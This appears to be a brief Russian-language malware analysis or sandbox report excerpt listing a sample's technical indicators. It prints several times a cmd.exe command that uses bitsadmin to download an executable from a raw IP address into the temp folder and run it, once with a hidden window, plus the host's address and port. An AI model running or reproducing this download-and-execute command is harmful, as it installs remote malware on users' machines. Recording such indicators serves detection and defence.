Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer /download "http://185.133.73.209/dasd3Sa/kjfkjd.exe" "%tmp%/mark.exe" && "%tmp%/mark.exe"
- '18#.#33.73.209':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer /download "http://185.133.73.209/dasd3Sa/kjfkjd.exe" "%tmp%/mark.exe" && "%tmp%/mark.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://185.133.73.209/dasd3Sa/kjfkjd.exe" "%LOCALAPPDATA%\Temp/mark.exe"